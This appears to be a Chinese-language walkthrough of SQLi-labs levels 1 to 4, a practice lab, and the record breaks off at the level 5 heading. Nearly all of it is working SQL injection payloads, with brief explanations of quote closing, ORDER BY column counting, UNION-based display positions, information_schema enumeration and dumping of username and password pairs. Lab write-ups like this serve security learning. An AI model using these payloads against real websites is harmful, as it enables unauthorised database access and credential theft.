LESS1
判断闭合符号,输入
?id=1'
根据报错信息( right syntax to use near ''1'' LIMIT 0,1' at line 1)判断大概闭合符号为' 再输入?id=1验证
猜测列名数
?id=1' order by 3 --+ (正常回显)
?id=1' order by 4 --+ 报错 Unknown column '4' in 'order clause',说明列数为3。注意 order by 前不能加 and,它不是条件表达式;--+ 中的 + 会被解码为空格,MySQL 的 -- 注释后面必须跟空白字符才生效
接下来进行联合查询
?id=-1' union select 1,2,3--+ (用 -1 是因为页面只显示结果集的第一行:id=1 时前半段查询本身有数据,显示的是它的那一行,union 后面的行虽然也被查出来但看不到;id=-1 不存在,前半段为空,显示的就是 union 那一行,从而看到回显位 2 和 3)
利用相同方法查询数据库?id=-1' union select 1,2,database() --+
爆破表名
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ 出现四个表名
查询一下USERS表?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ 信息太多尝试缩小范围
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+ 感觉很近了
?id=-1' union select 1,2,group_concat(username,0x3B,password) from users--+
#0x3B是;的十六进制码
LESS2
与第一关类似的就不赘述了
利用?id=1 和 ?id=1'
?id=-1 union select 1,2,3--+
利用?id=-1%20union%20select%201,2,database()--+ 查看当前数据库名(union 两边列数必须一致,这里是3列;database() 返回的是库名不是表名)
爆破表和列
?id=-1%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+ (字段名是 table_schema,库名是 security,拼错任何一个都会查不到或报错)
?id=-1%20union%20select%201,2,group_concat(username,0x7e,password)%20from%20users--+
LESS-3
判断闭合符号:?id=1' 会报错,再结合下面 ?id=1') 能正常闭合,说明这关的闭合符号是 ')
判断字段数和回显位置
?id=1') order by 3--+
?id=-1') union select 1,2,3--+
爆破库,表
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
(这关闭合符号带括号,原语句后面还剩一个 ') 和 LIMIT,不加 --+ 注释掉会因括号不匹配报错)
爆列,爆数据
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+
?id=-1') union select 1,2,group_concat(username,0x7e,password) from users--+
Less-4
判断闭合符号
?id=1\
输入 \ 后报错信息里紧跟在 \ 后面的字符就是闭合符号,这关是 ") ,即双引号加括号
回显数
?id=1") order by 3 --+
?id=-1") union select 1,2,3--+
爆库,表
?id=-1") union select 1,2,database()--+
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
爆字段 数据
?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+
?id=-1") union select 1,2,group_concat(username,0x7e,password) from users--+
Less-5